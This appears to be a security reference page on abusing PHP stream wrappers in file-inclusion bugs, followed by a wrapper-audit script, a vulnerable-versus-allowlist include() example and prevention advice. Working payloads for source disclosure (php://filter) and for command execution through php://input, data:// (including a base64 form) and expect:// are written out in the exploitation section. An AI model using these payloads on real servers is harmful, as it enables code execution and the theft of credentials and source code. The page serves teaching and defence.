PHP Wrappers

PHP stream wrappers are URL-style protocol handlers (scheme://) that PHP's filesystem functions (fopen(), file_get_contents(), include/require and friends) accept in place of a plain path. When user input reaches one of these functions, prefixing it with a wrapper turns an ordinary path-traversal or file-inclusion bug into arbitrary source-code disclosure, code execution from request data, or server-side request forgery, depending on which wrappers the target's php.ini permits.

Common Wrappers

file://     - Local filesystem access (the default when no scheme is given)
php://      - PHP I/O streams (php://filter, php://input, php://memory, ...)
data://     - Inline data as a URL (RFC 2397), plain or base64
http://     - HTTP(S) requests (needs allow_url_fopen; include needs allow_url_include)
ftp://      - FTP(S) access (same gating as http://)
zip://      - Read entries inside a zip archive (zip://archive.zip#entry.php)
phar://     - PHP Archive access (phar://archive.phar/entry.php)
expect://   - Process interaction via the PECL expect extension (rarely installed)

Exploitation Examples

php://filter - Read Source Code

# Read PHP source without executing it: the filter turns the include into a
# plain read. php:// is a local wrapper, so this works even with
# allow_url_include = Off. The resource may also be an absolute path.
?page=php://filter/convert.base64-encode/resource=config.php

# Output: PD9waHAKJGRiX3Bhc3N3b3JkID0gInNlY3JldCI7Cj8+
# Decode to get (newlines included in the base64):
#   <?php
#   $db_password = "secret";
#   ?>

php://input - Execute POST Data

# Requires allow_url_include = On. The request that triggers include($_GET['page'])
# must be a POST so that a body exists; PHP then reads the body as the "file".
# (php://input is empty for multipart/form-data bodies, so avoid that content type.)
POST ?page=php://input
POST body: <?php system('whoami'); ?>

# The request body is executed as PHP

data:// - Inline Code Execution

# Requires allow_url_include = On. In a real request, URL-encode the payload:
# <, ?, spaces and any '+' in the base64 (a raw '+' in a query string decodes
# to a space and corrupts the base64).
?page=data://text/plain,<?php system('id'); ?>
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg==

expect:// - Command Execution

# Only if the PECL expect extension is installed (it is not part of default
# builds). expect:// is a local wrapper, so allow_url_include = Off does not
# block it; the command runs with the web server's privileges.
?page=expect://whoami
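
The script below is an added example, not code from the original page. Run it inside the target's PHP runtime (for instance via php -r on a shell you already have, or a local copy of the target's php.ini) to see which of the wrappers above are registered and whether include()/require() of each is gated by allow_url_include. The gating rules encoded here follow the PHP manual's per-wrapper notes; the wrapper list is the page's own.

```php
<?php
// Added example (not code from the original page): report which of the wrappers
// listed above are registered in this PHP build and whether include()/require()
// of them is gated by allow_url_include. Gating follows the PHP manual.
declare(strict_types=1);

// Wrappers the manual marks "Restricted by allow_url_include: Yes".
const INCLUDE_GATED = ['http', 'https', 'ftp', 'ftps', 'data'];
// Wrappers additionally gated by allow_url_fopen for fopen()/file_get_contents().
const FOPEN_GATED = ['http', 'https', 'ftp', 'ftps'];

function ini_bool(string $name): bool
{
    // ini_get() returns "1"/"0", "On"/"Off" or "" depending on php.ini spelling.
    return filter_var(ini_get($name), FILTER_VALIDATE_BOOLEAN);
}

/**
 * One row per wrapper: is it registered, can include() use it under the current
 * php.ini, and a note for the special cases (php://filter vs php://input, expect).
 */
function wrapper_report(): array
{
    $registered = stream_get_wrappers();
    $urlInclude = ini_bool('allow_url_include');
    $urlFopen   = ini_bool('allow_url_fopen');
    $report     = [];

    foreach (['file', 'php', 'data', 'http', 'ftp', 'zip', 'phar', 'expect'] as $w) {
        $isRegistered = in_array($w, $registered, true);
        $includable   = $isRegistered && ($urlInclude || !in_array($w, INCLUDE_GATED, true));
        $note = '';
        if ($w === 'php') {
            // php://filter is a local stream and is never gated; php://input (and
            // php://stdin, php://memory, php://temp) need allow_url_include = On.
            $note = $urlInclude ? 'filter and input usable' : 'filter only; input needs allow_url_include';
        } elseif ($w === 'expect') {
            $note = $isRegistered ? 'PECL expect loaded: expect://cmd runs cmd' : 'PECL expect not loaded';
        } elseif (in_array($w, FOPEN_GATED, true) && !$urlFopen) {
            $note = 'also blocked for fopen() (allow_url_fopen=Off)';
        }
        $report[$w] = ['registered' => $isRegistered, 'includable' => $includable, 'note' => $note];
    }
    return $report;
}

printf("allow_url_fopen=%s allow_url_include=%s\n",
    ini_bool('allow_url_fopen') ? 'On' : 'Off', ini_bool('allow_url_include') ? 'On' : 'Off');
foreach (wrapper_report() as $w => $r) {
    printf("%-9s registered=%-3s include=%-3s %s\n",
        $w . '://', $r['registered'] ? 'yes' : 'no', $r['includable'] ? 'yes' : 'no', $r['note']);
}
```

On a stock build with allow_url_include = Off the output shows file, php (filter only), zip and phar as includable and data, http, ftp as registered but not includable; expect appears only when the PECL extension is loaded. That is exactly why php://filter source disclosure remains exploitable on hardened hosts where php://input and data:// payloads fail.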

Prevention

  • Never pass user input to include/require or to file functions; treat the
    request parameter as a key into a fixed allowlist of files, not as a path
  • Set allow_url_include = Off, which blocks php://input, data://, http:// and
    ftp:// in include(), and allow_url_fopen = Off where remote fetches are not needed
  • Remember that php://filter, zip://, phar://, expect:// and file:// are local
    wrappers and are NOT affected by those settings; only the allowlist stops them
  • There is no php.ini switch for individual wrappers; stream_wrapper_unregister()
    at runtime is the only built-in option and can be undone with stream_wrapper_restore()
  • Reject any value containing "://" or path separators before it reaches the
    filesystem, and verify the resolved path with realpath() against the base directory
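
As an added example (not code from the original page), here is the include() pattern the payloads above target beside an allowlist-based replacement that implements the points in this list. The page names, the pages/ directory under the system temp dir and PHP 8.0+ (for str_starts_with) are assumptions for illustration.

```php
<?php
// Added example (not code from the original page): the vulnerable include()
// that the payloads above target, beside an allowlist-based replacement.
// Page names, the pages/ directory and PHP 8.0+ (str_starts_with) are assumptions.
declare(strict_types=1);

// VULNERABLE: the request parameter is used as the path, so php://filter,
// php://input, data:// and ../ traversal all reach include() (subject to php.ini).
function vulnerable_include(string $page): void
{
    include $page;
}

// HARDENED: the parameter is a key into a fixed map, never a path. Anything not
// in the map is rejected before any filesystem or wrapper code sees it.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

// Returns the absolute file for an allowlisted key, or null for anything else.
function resolve_page(string $page, string $baseDir): ?string
{
    if (!array_key_exists($page, PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$page]);
    // Defence in depth: even with a trusted map, confirm the resolved file sits
    // under the base directory (catches a symlink or a misconfigured map entry).
    if ($base === false || $real === false || !str_starts_with($real, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $real;
}

function safe_include(string $page, string $baseDir): bool
{
    $path = resolve_page($page, $baseDir);
    if ($path === null) {
        http_response_code(404);
        return false;
    }
    include $path;
    return true;
}

// Demo with a constructed pages/ directory in the system temp dir so it runs anywhere.
$baseDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'wrapper_demo_pages';
if (!is_dir($baseDir)) {
    mkdir($baseDir, 0700, true);
}
file_put_contents($baseDir . DIRECTORY_SEPARATOR . 'about.php', "<?php echo \"about page\\n\";\n");

$inputs = [
    'about',                                                    // allowlisted key
    'php://filter/convert.base64-encode/resource=config.php',   // wrapper: rejected
    'data://text/plain,<?php system(\'id\'); ?>',               // wrapper: rejected
    '../../../../etc/passwd',                                   // traversal: rejected
    'home',                                                     // in map but file missing: rejected
];
foreach ($inputs as $in) {
    printf("%-58s -> %s\n", $in, resolve_page($in, $baseDir) ?? 'rejected');
}
safe_include('about', $baseDir);   // includes the constructed about.php
```

The important property is that resolve_page() never concatenates user input into a path: the wrapper payloads fail the array_key_exists() check and are never parsed by PHP's stream layer at all, so the php.ini settings in the list above become a second line of defence rather than the only one.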

See Also